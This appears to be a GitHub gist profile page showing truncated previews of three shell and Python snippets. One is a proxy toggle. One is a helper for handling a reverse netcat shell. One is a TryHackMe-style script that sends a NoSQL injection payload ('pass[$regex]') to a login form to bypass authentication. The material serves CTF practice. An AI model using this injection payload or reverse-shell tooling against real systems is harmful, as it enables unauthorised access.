Skip to content

Instantly share code, notes, and snippets.

View Esonhugh's full-sized avatar
💭
I may be slow to respond.

Esonhugh Skyworship Esonhugh

💭
I may be slow to respond.
View GitHub Profile
@Esonhugh
Esonhugh / proxy_shell.sh
Last active January 31, 2025 06:17
proxy setting for your shell
# Date: 2025-01-31
# Author: Esonhugh
# proxy command to make you switch your commandline fastly
export PROXY_HOST="127.0.0.1" # define as your favour
export PROXY_PORT="7890" # define as your favour
proxys(){
case "$1" in
(h)
echo "|==============================================|"
@Esonhugh
Esonhugh / pwnsh.sh
Last active May 9, 2022 23:02
pwnsh for good wraper for the reverse netcat shell
function pwnsh(){
case "$1" in
nc)
rlwrap $*
;;
tty)
stty -raw echo;fg
;;
re)
@Esonhugh
Esonhugh / exploit_nosqli.py
Last active November 15, 2021 08:15
Simple Nosqli injection Basic - Tryhackme Rooms
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, requests
target = "http://<target>/login.php"
post_form = 'user=admin&pass[$regex]={}&remember=on'
post_form = post_form.replace("admin","pedro")
header = {